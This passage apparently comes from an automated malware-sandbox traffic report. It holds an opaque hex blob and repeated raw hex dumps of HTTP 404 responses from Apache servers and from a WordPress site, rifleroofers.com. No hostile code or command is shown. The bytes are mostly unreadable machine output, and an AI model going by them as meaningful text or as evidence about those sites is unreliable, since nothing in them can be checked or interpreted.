6b 00 0c 1f 24 f1 21 92 92 91 84 48 89 12 48 98 81 14 65 30 98 c9 4c 3f 85 4d 88 c0 27 fd 05 c5 fb 78 44 78 bc ce c9 ba 33 80 71 7b a7 bb f2 84 87 87 87 87 47 84 bb 87 87 c7 ef fc b5 65 b9 a8 1e f6 45 76 57 6d 37 6f 7f 87 fe 3b db e4 bb db 2f 5e 7c 9d bf 20 bf 8b 7c f9 f6 77 b6 45 95 67 8b bb fc 70 2c aa 2f 5e 9c aa 55 77 f6 42 7c dd e5 db e2 8b 17 1f d6 c5 fd be 3c 54 2f b2 45 b9 ab 8a 1d 81 ba 5f 2f ab bb 2f 96 c5 87 f5 a2 e8 b2 1f 9d 6c bd 5b 57 eb 7c d3 3d 2e f2 4d f1 c5 a0 d7 ef 64 b2 66 77 b5 ae be 58 94 1f 8a 83 8e f9 50 ac 8a c3 81 7c ad 31 ef ca ae fc da bd bf 2b 76 dd 65 79 bf bb 3d e4 cb 42 af ba 2a 0f db bc ea 2e 8b aa 58 54 eb 72 07 50 54 c5 a6 d8 df 95 bb e2 8b 5d 49 2a 1d 17 87 f5 be ca f2 e3 c3 6e 91 1d 0f 8b 2f 5e dc 55 d5 fe 78 fd e6 cd fd fd 7d ef b6 2c 6f 37 04 ed ed 36 df e5 b7 c5 a1 b7 28 b7 6f 6e c9 ef 37 5f 1f ff ed f5 f2 8b 3f fb 6e 77 38 99 8d 66 57 97 e3 51 77 40 d0 bd e1 f8 24 de b7 ff 56 96 dd af 77 84 ca de 32 af f2 3f ca 1f 8a 43 f6 85 fd e9 df fd 77 b3 9f 7f 75 43 80 57 a7 1d 23 38 a3 8d bc be 78 54 20 bd fd e9 78 f7 3a 3f dc 9e b6 a4 1b c7 8b 9b 27 02 cd 80 3e fb fa f8 59 27 db 15 f7 d9 ef e7 55 f1 fa e2 e2 e6 df 52 45 a4 d7 ab f5 2d 29 fe 4c a7 f4 33 02 64 d2 da 94 07 7f d0 1d fd c5 97 3f fd f2 c7 7f fe e3 3f 1e fd 36 73 00 d2 a9 f7 1f 08 0e ef 6c f7 b8 ae 8a 2e 11 c8 f5 6a bd c8 0d 01 fa f3 9f 9d fe 68 f5 e3 5d ff 63 fe f5 f6 27 df fc f8 f7 27 7f f6 70 f9 fd ef 7f e8 7f bd fb a3 cb 6f de f7 7f 5a fe e0 47 c7 1f 5c 5d ee be 5c 1d 5f bc 79 fb 3b 9b f5 ee 7d 76 28 36 5f bc d8 1f 0a 82 64 47 24 32 5b ee 8e dd 3d 95 e4 6a 71 f7 22 bb 23 7f 7d f1 c2 cd ed 17 0d b1 74 09 8a cd 43 b5 5e 1c d3 b1 e4 5f e7 1f 05 9a 7c bf 6e 80 60 b1 dc 7d 4d aa 6d ca d3 72 b5 c9 0f 45 3a 86 3d e9 7f be 1c 0a 2a 88 70 2e c5 60 a4 a3 12 1d 59 1e 7b b7 bd 65 79 9a 6f 8a c5 66 bd 78 df db 15 55 1a a2 6a bf 38 07 3d f9 b2 1d 19 6c 8c 8f 15 69 7d d1 60 64 8e 85 e8 43 7a dd 15 99 05 c7 e6 4d 8b ea 6d c4 6a 7b ec fd e2 94 13 34 c5 e1 43 83 0e 1c 8b c5 89 08 23 d9 33 3e 90 85 a5 c1 f4 22 72 dd 83 63 5f dd af b7 b7 cd d0 7c 7d 5c 16 9b f5 87 43 fa f8 af b7 64 6e 1c bb ab a2 77 3c 6e ba e2 57 be cd bf 69 22 8c a4 c2 9e 2c 39 b4 33 4d 51 6c 7b db 62 b9 ce 1b 93 b0 ee 6d cb e3 dd 7a 5b 36 98 4a db 4d ef 43 be 39 11 b0 ed b6 38 2c 1a c8 c4 32 df 2c ce 80 63 1e c6 b1 29 f3 e5 0b b2 d1 52 0d 65 47 54 26 aa 7e f1 bf df dc 97 ab 95
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 07:08:13 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 07:08:16 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 07:08:19 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 07:08:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 07:08:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 07:08:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 735_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 21 Mar 2023 07:08:36 GMTserver: LiteSpeedData Raw: 35 32 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 7f 77 db 36 b2 e8 df f2 39 fd 0e 08 fd 36 b6 12 92 22 a9 1f 96 65 cb bd 6d da ee f6 bc 76 d3 d3 b4 77 df de 24 cf 07 22 21 89 09 45 f2 92 94 65 d7 f5 77 7f 67 06 00 09 52 94 44 c9 4e 6f f7 6d f6 de cd 5a 20 30 33 18 0c 66 06 83 01 70 f9 ec 9b d7 af 7e f9 e7 4f df 92 79 b6 08 ae be 38 ba 84 ff 25 9e 9f 8c b5 20 4b 34 12 d0 70 36 d6 58 68 fc fa 46 3b 6a c5 09 9b fa b7 63 2d 9a 8d c8 3c cb e2 74 d4 e9 44 b3 d8 5c b0 4e 98 1e 6b 04 01 30 ea c1 ff 2e 58 46 89 3b a7 49 ca b2 b1 f6 eb 2f df 19 43 2d 2f 0f e9 82 8d b5 1b 9f ad e2 28 c9 34 e2 46 61 c6 c2 6c ac ad 7c 2f 9b 8f 3d 76 e3 bb cc c0 1f 3a f1 43 3f f3 69 60 a4 2e 0d d8 d8 46 28 81 1f 7e 24 09 0b c6 5a 9c 44 53 3f 60 1a 99 27 6c 3a d6 24 59 b3 45 3c 33 a3 64 d6 b9 9d 86 1d 1b 1b 7d 71 74 99 f9 59 c0 ae 7e a2 33 46 c2 28 23 d3 68 19 7a e4 f9 f1 d0 b1 ed 0b f2 b3 3f 0d 18 f9 39 8a a6 2c 49 2f 3b bc ee d1 51 ab 75 f9 cc 30 c8 57 41 40 fc 90 bc 0e 19 79 f3 ed 6b d2 33 1d f3 9c 18 84 fa 51 ca 22 d3 8d 16 c4 30 ae a0 32 76 9c 77 30 89 26 51 96 2a dd 0b 23 3f f4 d8 ad 46 3a d5 aa 33 16 b2 84 66 51 a2 d4 ae a0 3c fd ea fb d7 6f be 7d dd 16 b8 25 90 d4 4d fc 38 23 d9 5d cc c6 1a 8d e3 c0 77 69 e6 47 61 27 f0 5e 7e 48 a3 50 23 6e 40 d3 74 ac 71 52 8d d4 9d b3 05 d5 80 80 d6 bd f6 1f c8 fa db 4c 1b 09 d6 bd eb bc eb f0 2a c0 3e 4d d7 fe 63 96 d0 78 ae 8d de de 6b ff 01 48 b4 91 f6 75 c2 a8 e7 26 cb c5 e4 07 3f cd a0 8e ef 95 00 24 c0 ca 84 73 12 78 f3 ae 33 8f 27 67 ef 3a c7 93 bc 65 c0 5b fa 19 5b 00 90 6f 03 b6 60 61 56 42 03 e5 df 67 6c d1 08 c1 31 00 14 b5 e3 28 f5 81 05 da c8 d6 35 c0 a0 8d 0a e2 ff c1 26 20 00 8d 80 6a ba 06 23 a9 8d b4 bf 45 0b 68 e2 31 ce 6e 04 ae fd 10 45 1f fd 70 46 a6 51 42 28 09 d9 8a 40 9f 75 fc 97 24 2c a6 7e a2 13 fc 06 e5 24 61 8b c8 63 c1 97 e4 1f ec e4 86 91 59 94 91 bb 68 49 dc e8 86 25 cc 33 c9 ab 68 b1 60 89 eb d3 00 1a 25 2c f5 3d 16 82 e8 93 94 25 30 23 4c f2 4b 14 93 ff 5e d2 c0 cf ee 10 0b 60 a7 19 a1 21 a1 d3 69 94 78 74 12 30 12 27 be cb 9e 69 ba b6 4c 82 1d c3 a2 3d e8 5a c8 6e 39 e3 54 11 d8 38 82 39 9b 1f f4 82 a7 7b 8d 94 10 85 1c 90 ae 15 e3 e5 3c 6e bc 38 e8 62 d4 fe 1e 65 e4 3b 98 e4 8d 98 21 5a 3f e8 5a 9c b0 1b 3f 5a a6 28 4f db d9 52 c8 dd c3 7b 95 25 af 93 19 0d fd df 70 2a 36 92 b5 e3 a8 dc 42 08 5e 49 2b 35 ea 86 a6 6b 41 34 8b 54 99 ff 7e 41 67 ec f5 e4 03 73 61 b6 ee 16 8b 55 6c 08 95 fc ae b3 8c 83 88 7a e9 bb 8e 63 39 dd 77 1d cb 7e d7 01 f0 46 18 19 13 ea 7e 9c 25 c0 5f 33 0e 51 57 ec d4 03 a5 5e fe 00 64 ea 5c e9 6b 23 db Data Ascii: 5253
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 735_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 21 Mar 2023 07:08:38 GMTserver: LiteSpeedData Raw: 35 32 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 7f 77 db 36 b2 e8 df f2 39 fd 0e 08 fd 36 b6 12 92 22 a9 1f 96 65 cb bd 6d da ee f6 bc 76 d3 d3 b4 77 df de 24 cf 07 22 21 89 09 45 f2 92 94 65 d7 f5 77 7f 67 06 00 09 52 94 44 c9 4e 6f f7 6d f6 de cd 5a 20 30 33 18 0c 66 06 83 01 70 f9 ec 9b d7 af 7e f9 e7 4f df 92 79 b6 08 ae be 38 ba 84 ff 25 9e 9f 8c b5 20 4b 34 12 d0 70 36 d6 58 68 fc fa 46 3b 6a c5 09 9b fa b7 63 2d 9a 8d c8 3c cb e2 74 d4 e9 44 b3 d8 5c b0 4e 98 1e 6b 04 01 30 ea c1 ff 2e 58 46 89 3b a7 49 ca b2 b1 f6 eb 2f df 19 43 2d 2f 0f e9 82 8d b5 1b 9f ad e2 28 c9 34 e2 46 61 c6 c2 6c ac ad 7c 2f 9b 8f 3d 76 e3 bb cc c0 1f 3a f1 43 3f f3 69 60 a4 2e 0d d8 d8 46 28 81 1f 7e 24 09 0b c6 5a 9c 44 53 3f 60 1a 99 27 6c 3a d6 24 59 b3 45 3c 33 a3 64 d6 b9 9d 86 1d 